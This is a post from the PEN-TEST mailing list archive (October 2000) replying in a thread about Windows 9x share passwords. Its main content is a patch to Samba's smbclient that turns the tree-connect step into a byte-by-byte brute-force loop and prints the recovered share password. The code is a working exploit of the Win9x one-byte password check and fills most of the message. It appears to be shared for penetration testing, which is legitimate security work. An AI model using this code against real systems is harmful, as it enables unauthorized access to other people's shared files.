Penetration Testing mailing list archives

Re: [PEN-TEST] How to test 1 byte password for win9X share

From: Christophe GRENIER <grenier () NEF ESIEA FR>
Date: Wed, 18 Oct 2000 12:21:48 +0200

On Tue, 17 Oct 2000, soren wrote:

Hi naif:)
It does work for me,with smbclient 2.0.6 and with the 'patch' that was
posted on BUGTRAQ.


Idem, it works well. I have modify smbclient to give me the password.

        Christophe

--- samba-2.0.7/source/client/client.c.org      Wed Apr 26 01:06:41 2000
+++ samba-2.0.7/source/client/client.c  Mon Oct 16 14:57:40 2000
@@ -1889,6 +1889,7 @@
        char *server_n;
        struct in_addr ip;
        extern struct in_addr ipzero;
+       int pwd_length=1;

        if (*share == '\\') {
                server = share+2;
@@ -1974,14 +1975,26 @@

        DEBUG(4,(" session setup ok\n"));

+/*
        if (!cli_send_tconX(c, share, "?????",
                            password, strlen(password)+1)) {
                DEBUG(0,("tree connect failed: %s\n", cli_errstr(c)));
                cli_shutdown(c);
                return NULL;
        }
-
-       DEBUG(4,(" tconx ok\n"));
+*/
+       for(pwd_length=0;pwd_length<14;pwd_length++)
+       {
+         password[pwd_length] = 0;
+         password[pwd_length+1] = 0;
+         c->sec_mode = 0;
+         do{
+           password[pwd_length]+=1;
+         }while(password[pwd_length] && !cli_send_tconX(c, share, "?????", password, pwd_length+1));
+         DEBUG(4,(" tconx ok\n"));
+         fflush(stdout);
+       }
+       printf("Password : %s\n",password);

        return c;
 }

-------------------------------------------------------------------------------
  ,-~~-.___.     ._.                       -= GRENIER Christophe =-
 / |  '     \    | |"""""""""|              sysadm de nef.esiea.fr
(  )         0   | |         |                     ESIEA
 \_/-, ,----'    | |         |          Ecole Superieure d'Informatique -
    ====         !_!--v---v--"          Electronique - Automatique
    /  \-'~;      |""""""""|
   /  __/~| ._-""||        |            Email: grenier () nef esiea fr
 =(  _____|_|____||________| http://www.esiea.fr/public_html/Christophe.GRENIER/
-------------------------------------------------------------------------------

Current thread:

[PEN-TEST] How to test 1 byte password for win9X share Fabio Pietrosanti (naif) (Oct 17)
- Re: [PEN-TEST] How to test 1 byte password for win9X share soren (Oct 17)
  - Re: [PEN-TEST] How to test 1 byte password for win9X share Christophe GRENIER (Oct 18)
- Re: [PEN-TEST] How to test 1 byte password for win9X share ghandi (Oct 18)
  - Re: [PEN-TEST] How to test 1 byte password for win9X share Dragos Ruiu (Oct 18)